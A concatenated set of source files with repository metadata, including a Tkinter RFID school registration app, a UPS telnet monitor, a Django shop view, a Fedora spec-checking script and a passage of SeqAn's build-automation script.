def add_records_to_db(self):
print("Start Import")
self.openDb()
try:
self.db.execute("""SELECT * FROM students""")
all_rows = self.db.fetchall()
#print(self.l[10][0],self.l[10][1],self.l[10][2])
for i in range(self.num):
flag=0
for row in all_rows:
if self.l[i][0].lower() == row[1].lower() and self.l[i][1].lower() == row[2].lower() and self.l[i][2].lower()== row[3].lower():
flag=1
break
if flag==0:
if self.l[i][4]!="NULL":
self.l[i][4]=hashlib.md5(str(self.rfid.get()).encode('utf-8')).hexdigest()
self.db.execute("INSERT INTO students VALUES(NULL,?,?,?,?,?,NULL)",(self.l[i]))
else:
print(self.l[i][0],self.l[i][1], "already in database")
except:
self.closeDb()
print("Problem importing the file. This is most likely because it is not in the correct format:\n\
surname, firstname, group, year, rfid_number. \n\
If RFID number is unavailable use NULL")
else:
self.closeDb()
print("End Import")
class UpdateEndOfYear(Db):
def update_students(self):
u=( "Removes all Year 13 from database\n"
"and updates Year 12 students to Year 13\n"
"WARNING: THIS MAKES SUBSTANTIAL CHANGES\n"
"TO THE DATABASE THAT CANNOT BE RECOVERED")
self.w = Toplevel()
self.w.wm_title("Update students")
self.w.geometry("500x150")
self.w.configure(background="white")
self.w.resizable(False, False)
Label(self.w, text=u, font=("Helvetica",12), bg="white").pack()
Button(self.w,text="Update",background="white",command=self.update_db).pack()
Button(self.w,text="Exit",background="white",command=self.w.destroy).pack()
def update_db(self):
self.openDb()
self.db.execute("DELETE FROM students WHERE year=13")
self.db.execute("UPDATE students SET year=13 WHERE year=12")
self.db.execute("""SELECT * FROM students""")
all_rows = self.db.fetchall()
for row in all_rows:
old_group=row[3]
new_group=old_group.replace("L","U")
self.db.execute("UPDATE students SET groupID=? WHERE studentID=?",(new_group,row[0]))
self.closeDb()
self.w.destroy()
class ExportStudents(Db):
def get_students(self):
f=open("students.csv","w")
self.openDb()
self.db.execute("""SELECT * FROM students ORDER BY surname""")
all_rows = self.db.fetchall()
for row in all_rows:
f.write(str(row[1])+str(",")+str(row[2])+str(",")+str(row[3])+str(",")+str(row[4])+str("\n"))
f.close()
self.closeDb()
self.get_students_window()
def get_students_window(self):
s = Toplevel()
s.wm_title("Export Students")
s.geometry("350x100")
s.resizable(False, False)
s.configure(background="white")
Label(s,text="Export Students", font=("Helvetica",18), background="white").pack()
Label(s, text="List of students successfully exported into students.csv file.", bg="white", justify=LEFT).pack(side="top", fill="both", expand=True, padx=10, pady=10)
Button(s,text="Exit",background="white",command=s.destroy).pack()
class RemoveStudent(Db):
def remove_student(self):
self.openDb()
self.db.execute("SELECT surname, firstname, groupID FROM students ORDER BY surname")
all_rows = self.db.fetchall()
self.students=[]
for row in all_rows:
self.students.append(row[0] + " " + row[1] + " " + row[2])
self.closeDb()
self.remove_students_win()
def remove_students_win(self):
self.add_win = Toplevel()
self.add_win.wm_title("Update Students")
self.add_win.geometry("180x130")
self.add_win.resizable(False, False)
self.add_win.configure(background="white")
self.st = StringVar(self.add_win)
self.st.set(self.students[0])
self.entryVal=StringVar()
self.entryVal.set("")
Label(self.add_win, text="Remove Students", font=("Helvetica",16), bg="white").grid(row=1)
o=OptionMenu(self.add_win, self.st, *self.students)
o.configure(background="white")
o.grid(row=2)
Button(self.add_win,text="Remove Student",background="white",command=self.remove_students_sql).grid(row=3)
Button(self.add_win,text="Close",background="white",command=self.add_win.destroy).grid(row=4)
def remove_students_sql(self):
print("Removed Student: "+ self.st.get())
a=self.st.get().split()
self.entryVal.set("Removed Student: "+ self.st.get())
self.openDb()
self.db.execute("DELETE from students WHERE surname=? AND firstname=? AND groupID=?",(a[0],a[1],a[2]))
self.closeDb()
self.add_win.destroy()
class AddStudent(Db):
def add_student(self):
add_win = Toplevel()
add_win.wm_title("Add Student")
add_win.geometry("200x370")
add_win.resizable(False, False)
add_win.configure(background="white")
self.years=["12","13"]
self.firstname = Entry(add_win)
self.surname = Entry(add_win)
self.group = Entry(add_win)
self.rfid = Entry(add_win,show="*")
self.entryVal = StringVar(add_win)
self.year = StringVar(add_win)
Label(add_win, text="Add Student", font=("Helvetica",16), bg="white").pack()
Label(add_win, text="Firstname", font=("Helvetica",12), bg="white").pack()
self.firstname.pack()
Label(add_win, text="Surname", font=("Helvetica",12), bg="white").pack()
self.surname.pack()
Label(add_win, text="Year", font=("Helvetica",12), bg="white").pack()
o=OptionMenu(add_win, self.year, *self.years)
o.configure(background="white")
o.pack()
Label(add_win, text="Group", font=("Helvetica",12), bg="white").pack()
self.group.pack()
Label(add_win, text="RFID", font=("Helvetica",12), bg="white").pack()
self.rfid.pack()
Label(add_win, textvariable=self.entryVal, bg="white").pack()
Button(add_win,text="Add Student",background="white",command=self.add_students_sql).pack()
Button(add_win,text="Close",background="white",command=add_win.destroy).pack()
def reset_student_values(self):
self.rfid.delete(0, END)
self.rfid.insert(0, "")
self.firstname.delete(0, END)
self.firstname.insert(0, "")
self.surname.delete(0, END)
self.surname.insert(0, "")
self.group.delete(0, END)
self.group.insert(0, "")
def add_students_sql(self):
if self.surname.get() !="" and self.firstname.get() !="":
hashed_rfid=hashlib.md5(str(self.rfid.get()).encode('utf-8')).hexdigest()
print("Added student:",self.surname.get(),self.firstname.get(),self.group.get(),int(self.year.get()),hashed_rfid)
self.entryVal.set("Added: "+ self.firstname.get() + " " + self.surname.get())
self.openDb()
self.db.execute("SELECT * FROM students")
all_rows = self.db.fetchall()
flag=0
for row in all_rows:
if self.surname.get().lower() == row[1].lower() and self.firstname.get().lower() == row[2].lower() and self.group.get().lower() == row[3].lower():
flag=1
break
if flag==0:
self.db.execute("INSERT INTO students VALUES(NULL,?,?,?,?,?,NULL)"\
,(self.surname.get(),self.firstname.get(),self.group.get(),int(self.year.get()),hashed_rfid))
self.entryVal.set("Added: "+ self.firstname.get() + " " + self.surname.get())
else:
self.entryVal.set(self.surname.get(),self.firstname.get(), "already in database")
self.closeDb()
self.reset_student_values()
class Rfid(Db):
def __init__(self):
self.tag=""
self.todays_date=datetime.datetime.today().strftime("%Y%m%d")
def rfid_win(self):
self.win = Toplevel()
self.win.wm_title("Take Register")
self.win.geometry("200x200")
self.win.resizable(False, False)
self.win.configure(background="white")
Label(self.win,text="Click here\n to take register", font=("Helvetica",16), background="white").pack()
self.frame = Frame(self.win, width=200, height=100, background="white")
self.frame.bind("<Key>", self.key)
self.frame.bind("<Button-1>", self.callback)
self.frame.pack()
Button(self.win,text="Close",background="white",command=self.win.destroy).pack()
def key(self,event):
press = repr(event.char)
if ord(event.char) != 13:
self.tag +=press.strip("'")
else:
if len(self.tag) > 0:
self.hashed_rfid=hashlib.md5(str(self.tag).encode('utf-8')).hexdigest()
self.rfid_sql()
#print(self.hashed_rfid)
self.tag = ""
def callback(self,event):
self.frame.focus_set()
def rfid_sql(self):
self.openDb()
self.db.execute("UPDATE students SET last_registration=? WHERE rfid=?",(int(self.todays_date),self.hashed_rfid,))
self.db.execute("SELECT surname, firstname, groupID FROM students WHERE rfid=?",(self.hashed_rfid,))
record = self.db.fetchone()
self.closeDb()
print(record[0]+","+record[1]+","+record[2])
class GenerateRegister(Db):
def generate_register(self):
self.win = Toplevel()
self.win.wm_title("Generate Register")
self.win.geometry("200x200")
self.win.resizable(False, False)
self.win.configure(background="white")
Label(self.win,text="Generate register", font=("Helvetica",16), background="white").pack()
self.years=["Year 12","Year 13"]
self.year = StringVar(self.win)
Label(self.win, text="Year", font=("Helvetica",12), bg="white").pack()
o=OptionMenu(self.win, self.year, *self.years)
o.configure(background="white")
o.pack()
Button(self.win,text="Generate Register",background="white",command=self.generate_register_sql).pack()
def generate_register_sql(self):
print("Generate Register")
self.openDb()
self.db.execute("""SELECT MAX(last_registration) FROM students""")
last_registration_date = self.db.fetchall()
print(last_registration_date[0][0])
register="register_"+str(last_registration_date[0][0])+".csv"
f=open(register,"w")
if self.year.get()=="Year 12":
self.db.execute("SELECT * FROM students WHERE year=12 ORDER BY surname")
elif self.year.get()=="Year 13":
self.db.execute("SELECT * FROM students WHERE year=13 ORDER BY surname")
all_records = self.db.fetchall()
for record in all_records:
if record[6]==last_registration_date[0][0]:
f.write(record[1]+str(",")+record[2]+str(",")+record[3]+str(",/\n"))
else:
f.write(record[1]+str(",")+record[2]+str(",")+record[3]+str(",N\n"))
f.close()
self.closeDb()
self.win.destroy()
class Gui(Db):
def __init__(self):
self.d=ExportStudents()
self.h=Help()
self.u=UpdateEndOfYear()
self.adds=AddStudent()
self.impStudents=ImportStudents()
self.us=UpdateStudents()
self.rs=RemoveStudent()
self.rfid=Rfid()
self.gr=GenerateRegister()
self.window = Tk()
self.window.title("Assembly Registration App")
self.window.configure(background="white")
self.window.resizable(False, False)
# self.image = PhotoImage(data=self.encode64())
# self.image = self.image.subsample(3, 3)
self.label1 = Label(self.window,text="Aspire Assembly \nRegistration App", font=("Helvetica",18), background="white").grid(row=1)
# self.label2 = Label(self.window, image=self.image).grid(row=2,padx=20,pady=5)
Button(self.window, text='Take Register',background="white",command=self.rfid.rfid_win,font=("Helvetica",10),width=15,pady=5).grid(row=3)
Button(self.window, text='Export Register',background="white",command=self.gr.generate_register,font=("Helvetica",10),width=15,pady=5).grid(row=4)
Button(self.window, text='Import Students',background="white",command=self.impStudents.import_students,font=("Helvetica",10),width=15,pady=5).grid(row=5)
Button(self.window, text='Export Students',background="white",command=self.d.get_students,font=("Helvetica",10),width=15,pady=5).grid(row=6)
Button(self.window, text='Add Student',background="white",command=self.adds.add_student,font=("Helvetica",10),width=15,pady=5).grid(row=7)
Button(self.window, text='Remove Student',background="white",command=self.rs.remove_student,font=("Helvetica",10),width=15,pady=5).grid(row=8)
Button(self.window, text='Update Student RFID',background="white", command=self.us.list_students, font=("Helvetica",10),width=15,pady=5).grid(row=9)
Button(self.window, text='End of Year Update',background="white",command=self.u.update_students, font=("Helvetica",10),width=15,pady=5).grid(row=10)
Button(self.window, text='Help',background="white",command=self.h.help,font=("Helvetica",10),width=15,pady=5).grid(row=11)
Button(self.window, text='Exit',background="white",command=self.window.destroy,font=("Helvetica",10),width=15,pady=5).grid(row=12)
self.window.mainloop()
# def encode64(self):
# self.image = open('csf-logo.png', 'rb').read()
# self.image_64_encode = base64.b64encode(self.image)
# return self.image_64_encode
class App():
def __init__(self):
Db()
Gui()
if __name__ == '__main__':
App()
| [
"noreply@github.com"
] | noreply@github.com |
020359ee2e96f27dfb8106427a0cac3ff587cb41 | f7e511e0dc14d2b23d2bbc1c7023d1efd346829a | /rocon_smartthings_bridge/setup.py | aeb49db35e53c3477c0c68ca0f7000b82d8e1551 | [] | no_license | robotics-in-concert/rocon_devices | 1f6ffd0968a0cc565a1992b8423e5a497dbd3440 | 614a190cb9f531c3db83c3e3e4650e8a0971c8c1 | refs/heads/develop | 2021-01-10T21:06:25.738755 | 2015-07-28T08:29:35 | 2015-07-28T08:29:35 | 18,580,058 | 10 | 11 | null | 2018-02-19T22:24:08 | 2014-04-09T00:40:15 | Python | UTF-8 | Python | false | false | 233 | py | #!/usr/bin/env python
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
d = generate_distutils_setup(
packages=['rocon_smartthings_bridge'],
package_dir={'': 'src'},
)
setup(**d)
| [
"jihoonlee.in@gmail.com"
] | jihoonlee.in@gmail.com |
8d929af30fecbb516a27705d9275e005f0984c4c | e9c43b9df16d171b46e9a28b0862c2ad4619b832 | /apc1000x.py | a444e29e92d4f2a11e61ce0ed6f3551a9a78e7b4 | [] | no_license | Interra-seven/Zabbix-ex | 5e4b16f38f6d6eae92d76f5e02ac227aaa3c1975 | 058c69c93c684c807ee827e1e5a6c26fdec6fa9d | refs/heads/master | 2020-03-23T09:58:32.964830 | 2019-02-12T12:01:01 | 2019-02-12T12:01:01 | 141,418,269 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,045 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import telnetlib
import re
import time
fin_lst = []
rgx_chg = re.compile('Battery charge[ ]+: ([0-9.]+)')
rgx_ld = re.compile('Load[ ]+: ([0-9.]+)')
rgx_vac = re.compile('Input voltage[ ]+: ([0-9.]+)')
if len(sys.argv) == 2:
tln = telnetlib.Telnet(sys.argv[1], 50 , 10)
time.sleep(3)
tln.write('\r\n')
data = (str(tln.read_until('>', 30))).split("\r\n")
tln.close()
for i in range (len(data)):
fnd_chg = rgx_chg.search(data[i])
fnd_ld = rgx_ld.search(data[i])
fnd_vac = rgx_vac.search(data[i])
if fnd_chg != None:
fin_lst.append('Battery charge: ' + str(fnd_chg.group(1)))
if fnd_ld != None:
fin_lst.append(' battery load: ' + str(fnd_ld.group(1)))
if fnd_vac != None:
fin_lst.append(' input VAC: ' + str(fnd_vac.group(1)))
print (" ".join(fin_lst)) + "\n"
log_f = open('/var/log/krv-apc1000x.log', 'a')
log_f.write(str(time.strftime('%d-%m-%Y %H:%M:%S')) + " " + (" ".join(fin_lst)) + "\n")
log_f.close()
else:
"The amount of attrib isn't correct!"
| [
"root@zabbix.interra.ru"
] | root@zabbix.interra.ru |
c2c5a3bd5bc7aa5c6d90f990321bbb6815626975 | 46d7bf2d5cfad08ef1301d3b3f54ddf07161df7d | /Jame.py | 8020a30c227104ba8eaad48c373ef4c16ff7d026 | [] | no_license | SanMuShen/Hobby | 6c498cba0091d8c7b7e31b543791a3711bcb2a16 | fe132108e4f593e87cf3f533adddd840e2a8de84 | refs/heads/master | 2020-03-30T00:46:09.771239 | 2018-09-27T03:53:17 | 2018-09-27T03:53:17 | 150,542,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48 | py | #!/usr/bin/python3
print('你好啊!带土')
| [
"yaxu@tedu.cn"
] | yaxu@tedu.cn |
09dbe557b734959de714b524c4c6d01b5e629ece | 40f68e2d7bf25fe6621a35f547f83fd003398c11 | /MShop/views.py | eff3df95af950cce74a484274f89e0e0b4db7ad9 | [] | no_license | DelaCerna-WebDev2/TasaShop | 91fc5c8828ef88fe0a7d5be4f71a9da91d804e20 | c3c30bdc11f85b071281b3658151647a4115b647 | refs/heads/main | 2023-05-09T08:39:01.236809 | 2021-06-04T00:44:28 | 2021-06-04T00:44:28 | 373,036,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | from django.shortcuts import render
from .models import *
def shop(request):
products = Product.objects.all()
cont = {'products': products}
return render(request, 'shop.html', cont)
def cart(request):
if request.user.is_authenticated:
customer = request.user.customer
order, created = Order.objects.get_or_create(customer=customer, complete=False)
cartlist = order.cart_set.all()
else:
cartlist = []
cont = {'cartlist':cartlist}
return render(request, 'cart.html', cont)
def checkout(request):
cont = {}
return render(request, 'checkout.html', cont)
| [
"sharalyn.delacerna@gsfe.tupcavite.edu.ph"
] | sharalyn.delacerna@gsfe.tupcavite.edu.ph |
2f2d2f98b445b7c273a6c0c3b80e0ecc367e2b89 | e77d6b3dcc1deb5c7d22eaba6fb00dbc33d0e5ac | /scripts/check-specs.py | 16ae37cdb22e56b738e9d406ee80311f3678a753 | [
"MIT"
] | permissive | troycurtisjr/portingdb | a6a4d30b78eefacdfe0abb1a0a5be59fb6f5d7be | 6c5cf2b82551f4e40fc03d56e5f65d1dd2030d43 | refs/heads/master | 2021-07-06T19:56:27.646021 | 2017-09-22T14:39:49 | 2017-09-22T14:40:33 | 105,333,401 | 1 | 0 | null | 2017-09-30T02:11:26 | 2017-09-30T02:11:26 | null | UTF-8 | Python | false | false | 5,099 | py | #! /usr/bin/env python3
"""Get number of specs which are also used for rhel.
Check how many spec files among Fedora packages with naming issues
are cross platform, meaning that the same spec file is also used
for rhel/epel.
This check is pretty naive and gives just general information.
It checks spec files for using `%if %{?rhel}` conditionals
and may have false positives.
Usage: ./scripts/check-specs.py
The result of runnig this script is saved in `data/rhel-specs.json` file.
Use the following command to update contents of the file:
./scripts/check-specs.py --epel -o data/rhel-specs.json
"""
import click
import json
import logging
import os
import urllib.request
import urllib.error
from datetime import datetime
from multiprocessing import Pool
from sqlalchemy import create_engine
from portingdb.htmlreport import get_naming_policy_progress
from portingdb.load import get_db
# Log INFO and above to stderr with a short "LEVEL: message" format.
logging.basicConfig(format='%(levelname)s: %(message)s')
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# Substrings whose presence in a spec file marks it as cross-platform.
MARKERS = ('%{?rhel}',)
# URL templates: raw spec file in Fedora dist-git, and the pkgdb JSON API.
SPEC_URL = 'http://pkgs.fedoraproject.org/cgit/rpms/{0}.git/plain/{0}.spec'
PKGDB_API = 'https://admin.fedoraproject.org/pkgdb/api/package/{}?acls=false'
def get_portingdb(db):
    """Return session object for portingdb."""
    engine = create_engine('sqlite:///' + db)
    return get_db(None, engine=engine)
def check_spec(package):
    """Check the package's spec file for cross-platform MARKERS.

    Arguments:
    - package (Package object)
    Return: package if any marker occurs in its spec file, None otherwise
    """
    url = SPEC_URL.format(package.name)
    try:
        body = str(urllib.request.urlopen(url).read())
    except urllib.error.URLError as err:
        logger.error('Failed to get spec %s. Error: %s', url, err)
        return None
    if any(marker in body for marker in MARKERS):
        logger.warning('%s: %s', package.name, url)
        return package
    logger.debug('Checked spec for %s: OK', package.name)
    return None
def check_branches(package):
    """Check whether the package is built for el6 or epel7.

    Arguments:
    - package (Package object)
    Return: (name, branches) with the matching EPEL branches, or None
    when the pkgdb query failed.
    """
    url = PKGDB_API.format(package.name)
    try:
        response = urllib.request.urlopen(url)
    except urllib.error.URLError as err:
        logger.error('Failed to get package info %s. Error: %s', url, err)
        return None
    payload = json.loads(response.read().decode())
    branches = [entry['collection']['branchname']
                for entry in payload['packages']]
    wanted = ('el6', 'epel7')
    return package.name, [branch for branch in branches if branch in wanted]
def check_packages(packages, check_function):
    """Apply *check_function* to every package in parallel.

    Arguments:
    - packages (iterable)
    - check_function (function): called once per package; its falsy
      results are dropped.
    Return: list of truthy results of check_function

    Fix: the worker pool is now closed and joined via the context
    manager; the original leaked the Pool's worker processes.
    """
    with Pool(processes=10) as pool:
        results = pool.map(check_function, packages)
    return [pkg for pkg in results if pkg]
@click.command(help=__doc__)
@click.option('--db', help="Database file path.",
              default=os.path.abspath('portingdb.sqlite'))
@click.option('--epel', help="Check if the found packages are built for epel.",
              is_flag=True)
@click.option('-o', '--output',
              help="File path to write the resulted list of packages to.")
def main(db, epel, output):
    """Report packages with naming issues whose specs are cross-platform."""
    session = get_portingdb(db)
    _, data = get_naming_policy_progress(session)
    logger.info('Checking spec files for using %s...', ', '.join(MARKERS))
    # Map each naming-policy category to the packages whose spec uses MARKERS.
    result = {key[0].ident: check_packages(packages, check_spec)
              for key, packages in data}
    total = sum(packages.count() for _, packages in data)
    total_cross_platform = sum(len(found) for found in result.values())
    percentage = total_cross_platform * 100 / total
    print('\nPackages that use {} in spec files: {} of {} ({:.2f}%)'.format(
        ', '.join(MARKERS), total_cross_platform, total, percentage))
    for category in result:
        print(' {}: {}'.format(category, len(result[category])))
    if epel:
        logger.info('Checking for epel branches...')
        # Replace each package list with a {name: epel_branches} mapping.
        for category in list(result):
            result[category] = dict(check_packages(result[category],
                                                   check_branches))
        total_epel = sum(1 for packages in result.values()
                         for branches in packages.values() if branches)
        print('From those {}, have el6 or epel7 branch: {}'.format(
            total_cross_platform, total_epel))
    if output:
        with open(output, 'w') as outfile:
            result['generated_on'] = str(datetime.now())
            json.dump(result, outfile, indent=2,
                      default=lambda package: package.name)
if __name__ == '__main__':
main()
| [
"ishcherb@redhat.com"
] | ishcherb@redhat.com |
8de02a0c1735cdd7cd60394002e7404d4a42b5d8 | c1291afe09bbee423442db59c5054023a8ec3fc9 | /seqan/util/py_lib/seqan/auto_build.py | 9d2a8936607b6440c2c1fcb8977ac149549b184b | [
"BSD-3-Clause"
] | permissive | xp3i4/linear | ae9e2053cf6021a37a8636c0ec93f75dd91faba8 | 10b5c152b6760b00ec948bdb7af1065c356f2b54 | refs/heads/main | 2023-04-15T03:56:42.432451 | 2023-01-15T03:43:22 | 2023-01-15T03:43:22 | 457,251,654 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 24,743 | py | #!/usr/bin/env python
"""
Automatic building of SeqAn apps and releases.
"""
from __future__ import print_function
import subprocess
import optparse
import os.path
import re
import sys
import shutil
import tempfile
# The git command to use.
GIT_BINARY='git'
# The CMake command to use.
CMAKE_BINARY='cmake'
# The default repository URL.
REPOSITORY_URL='https://github.com/seqan/seqan.git'
# The path to the package repository.
DEFAULT_PACKAGE_DB='.'
# Regular expression to use for tag names.
# NOTE(review): the patch component is a single `\d`, so only one-digit
# patch levels match (e.g. "-v1.4.9" but not "-v1.4.10") -- confirm intended.
TAG_RE=r'.*-v\d+\.\d+\.\d(-\w+)?'
class MinisculeGitWrapper(object):
    """Minimal git wrapper.

    Thin shell around a handful of git subcommands; all progress and
    errors are printed to stderr rather than raised.
    """

    def lsRemote(self, url):
        """Execute 'git ls-remote ${url} --tags'.

        Returns a list of (revision, tag_name) pairs with the
        'refs/tags/' prefix stripped and peeled '^{}' entries skipped.
        NOTE(review): on git failure this returns the int 1 instead of a
        list, so callers that iterate the result must check first.
        NOTE(review): under Python 3 `out_data` is bytes, so the string
        comparisons below would need decoding -- confirm target version.
        """
        # Execute ls-remote command.
        print('Executing "%s %s %s"' % (GIT_BINARY, 'ls-remote --tags', url), file=sys.stderr)
        popen = subprocess.Popen([GIT_BINARY, 'ls-remote', '--tags', url],
                                 stdout=subprocess.PIPE)
        out_data, err_data = popen.communicate()
        print(' => %d' % popen.returncode, file=sys.stderr)
        if popen.returncode != 0:
            print('ERROR during git call.', file=sys.stderr)
            return 1
        # Parse out revisions and tags names.
        lines = out_data.splitlines()
        revs_tags = [(line.split()[0], line.split()[-1]) for line in lines]
        res = []
        for rev, tag in revs_tags:
            if '^{}' in tag:
                continue  # Skip peeled tag entries ('tag^{}').
            # Drop the leading 'refs/tags/' (10 characters).
            tag2 = tag[10:]
            res.append((rev, tag2))
        return res

    def checkout(self, path, treeish):
        """Execute "git checkout" in the checkout at path.

        On checkout failure, attempts to recover by un-staging
        everything and hard-resetting the working tree.  Returns the
        exit code of the last git command run.
        """
        # Executing git checkout.
        args = [GIT_BINARY, 'checkout', treeish]
        print('Executing "%s" in "%s"' % (' '.join(args), path), file=sys.stderr)
        popen = subprocess.Popen(args, cwd=path)
        out_data, err_data = popen.communicate()
        if popen.returncode != 0:
            print('ERROR during git call.', file=sys.stderr)
        # Executing force resetting to current revision.
        args = [GIT_BINARY, 'rm', '--cached', '.']
        print('Executing "%s" in "%s"' % (' '.join(args), path), file=sys.stderr)
        popen = subprocess.Popen(args, cwd=path)
        out_data, err_data = popen.communicate()
        if popen.returncode != 0:
            print('ERROR during git call.', file=sys.stderr)
        args = [GIT_BINARY, 'reset', '--hard']
        print('Executing "%s" in "%s"' % (' '.join(args), path), file=sys.stderr)
        popen = subprocess.Popen(args, cwd=path)
        out_data, err_data = popen.communicate()
        if popen.returncode != 0:
            print('ERROR during git call.', file=sys.stderr)
        return popen.returncode

    def archive(self, path, treeish, output, prefix):
        """Execute git archive.

        Writes *treeish* of the repo at *path* to the archive file
        *output*, with every entry placed under *prefix*/.
        """
        args = [GIT_BINARY, 'archive', '--prefix=%s/' % prefix, '--output=%s' % output, treeish]
        print('Executing "%s" in "%s"' % (' '.join(args), path), file=sys.stderr)
        popen = subprocess.Popen(args, cwd=path)
        out_data, err_data = popen.communicate()
        if popen.returncode != 0:
            print('ERROR during git call.', file=sys.stderr)
        return popen.returncode

    def clone(self, url, tag, dest_dir):
        """Execute 'git clone ${url} ${dest_dir}' and then get specific tag."""
        # Clone repository
        args = [GIT_BINARY, 'clone', url, dest_dir]
        print('Executing "%s"' % ' '.join(args), file=sys.stderr)
        popen = subprocess.Popen(args)
        popen.wait()
        print(' => %d' % popen.returncode, file=sys.stderr)
        if popen.returncode != 0:
            return popen.returncode
        # Switch the fresh clone to the requested tag.
        return self.checkout(dest_dir, tag)
class Package(object):
    """Represent a package with a given name, version, OS and architecture."""

    def __init__(self, name, version, os, word_size, pkg_format):
        # Map OS name and word size to the platform suffix in file names.
        platform_names = {
            'Windows': {'32': 'win32-i686', '64': 'win64-x86_64'},
            'Linux': {'32': 'Linux-i686', '64': 'Linux-x86_64'},
            'Mac': {'32': 'Darwin-i686', '64': 'Darwin-x86_64'},
        }
        self.name = name
        self.version = version
        self.os = os
        self.word_size = word_size
        self.system_name = platform_names[os][word_size]
        self.pkg_format = pkg_format

    def fileName(self):
        """Return the archive file name; the library package is platform-free."""
        if self.name == 'seqan-library':
            return '%s-%s.%s' % (self.name, self.version, self.pkg_format)
        return '%s-%s-%s.%s' % (self.name, self.version, self.system_name,
                                self.pkg_format)
class BuildStep(object):
    """Management of one build step.

    One BuildStep builds either a single app or a whole SeqAn release
    (apps + library) for one OS / word-size combination, then copies the
    resulting archives into the package database directory.
    """

    def __init__(self, path, treeish, name, version, os, word_size, pkg_formats,
                 repository_url, make_args, options, tmp_dir=None):
        """Normalize the version string and precompute the expected packages.

        The version is truncated at the first '-' and padded to
        major.minor.patch (patch defaults to 0).
        """
        self.base_path = path
        self.treeish = treeish
        self.name = name
        self.version = version.split('-', 1)[0]
        print ( 'Version: %s Self.Version: %s' % (version, self.version), file=sys.stdout)
        self.major_version = int(self.version.split('.')[0])
        print ( 'Major_Version: %s' % self.major_version, file=sys.stdout)
        self.minor_version = int(self.version.split('.')[1])
        print ( 'Minor_Version: %s' % self.minor_version, file=sys.stdout)
        self.patch_version = 0
        if len(self.version.split('.')) > 2:
            self.patch_version = int(self.version.split('.')[2])
        self.version = '%d.%d.%d' % (self.major_version, self.minor_version, self.patch_version)
        print ( 'Self_Version: %s' % self.version, file=sys.stdout)
        self.os = os
        self.word_size = word_size
        self.pkg_formats = pkg_formats
        # A full SeqAn release produces two packages per format.
        if name == 'seqan':
            self.packages = [Package(name + suffix, self.version, os, word_size, f)
                             for f in pkg_formats for suffix in ['-apps', '-library']]
        else:
            self.packages = [Package(name, self.version, os, word_size, f)
                             for f in pkg_formats]
        self.repository_url = repository_url
        self.make_args = make_args
        self.options = options
        # If set then this is used instead of a random name in TMPDIR.
        self.tmp_dir = tmp_dir

    def buildNeeded(self):
        """Returns whether one of the package files is missing.

        The expected path is rewritten with the same processor/OS name
        substitutions that copyArchives() applies when storing files.
        """
        for p in self.packages:
            package_path = os.path.join(self.base_path, p.name, p.fileName())
            if 'x86' in package_path and 'x86_64' not in package_path:  # fix processor name
                package_path = package_path.replace('x86', 'x86_64')
            if 'win32' in package_path or 'win64' in package_path:  # fix OS name
                package_path = package_path.replace('win32', 'Windows').replace('win64', 'Windows')
            if 'Darwin' in package_path:  # fix OS name
                package_path = package_path.replace('Darwin', 'Mac')
            if not os.path.exists(package_path):
                if self.options.verbosity >= 1:
                    print('File %s does not exist yet.' % package_path, file=sys.stderr)
                return True
            elif self.options.verbosity >= 1:
                print('File %s exists.' % package_path, file=sys.stderr)
        return False

    def copyArchives(self, build_dir):
        """Copy built packages to base_path directory.

        Missing archives are reported but not fatal; destination names
        are normalized (x86 -> x86_64, win32/win64 -> Windows,
        Darwin -> Mac) to match buildNeeded().
        """
        for p in self.packages:
            from_ = os.path.join(build_dir, p.fileName())
            if os.path.exists(from_):
                to = os.path.join(self.base_path, p.name, os.path.basename(from_))
                if not os.path.exists(os.path.dirname(to)):  # Create directory if necessary.
                    os.makedirs(os.path.dirname(to))
                print("Copying %s => %s" % (from_, to), file=sys.stderr)
                if 'x86' in to and 'x86_64' not in to:  # fix processor name
                    to = to.replace('x86', 'x86_64')
                if 'win32' in to or 'win64' in to:  # fix OS name
                    to = to.replace('win32', 'Windows').replace('win64', 'Windows')
                if 'Darwin' in to:  # fix OS name
                    to = to.replace('Darwin', 'Mac')
                shutil.copyfile(from_, to)
            else:
                print('%s does not exist (not fatal)' % from_, file=sys.stderr)

    def buildSeqAnRelease(self, checkout_dir, build_dir):
        """Build SeqAn release: Apps and library build.

        Returns 1 on the first failing CMake/build step, None on
        success (a failing 'docs' build is tolerated).
        """
        # Build seqan-apps.
        #
        # Create build directory.
        if not os.path.exists(build_dir):
            print('Creating build directory %s' % (build_dir,), file=sys.stderr)
            os.mkdir(build_dir)
        # Execute CMake.
        cmake_args = [CMAKE_BINARY, checkout_dir,
                      '-DSEQAN_BUILD_SYSTEM=SEQAN_RELEASE_APPS']
        # Use appropriate CMake flags for OS and processor.
        if self.word_size == '32':
            cmake_args.append('-DSEQAN_SYSTEM_PROCESSOR=i686')
            if self.os != 'Windows':
                cmake_args.append('-DCMAKE_CXX_FLAGS=-m32')
            else:
                cmake_args += ['-G', 'Visual Studio 10']
        else:  # self.word_size == '64'
            cmake_args.append('-DSEQAN_SYSTEM_PROCESSOR=x86_64')
            if self.os == 'Windows':
                cmake_args += ['-G', 'Visual Studio 10 Win64']
        print('Executing CMake: "%s"' % (' '.join(cmake_args),), file=sys.stderr)
        popen = subprocess.Popen(cmake_args, cwd=build_dir, env=os.environ.copy())
        out_data, err_data = popen.communicate()
        if popen.returncode != 0:
            print('ERROR during make call.', file=sys.stderr)
            print(out_data, file=sys.stderr)
            print(err_data, file=sys.stderr)
            return 1
        # Execute Make.
        cmake_args = [CMAKE_BINARY, '--build', build_dir, '--target', 'package', '--config', 'Release', '--'] + self.make_args
        print('Building with CMake: "%s"' % (' '.join(cmake_args),), file=sys.stderr)
        popen = subprocess.Popen(cmake_args, cwd=build_dir, env=os.environ.copy())
        out_data, err_data = popen.communicate()
        if popen.returncode != 0:
            print('ERROR during make call.', file=sys.stderr)
            print(out_data, file=sys.stderr)
            print(err_data, file=sys.stderr)
            return 1
        # Copy over the archives.
        self.copyArchives(build_dir)
        # Remove build directory.
        if not self.options.keep_build_dir:
            print('Removing build directory %s' % build_dir, file=sys.stderr)
            shutil.rmtree(build_dir)
        # Build seqan-library.
        #
        # Create build directory.
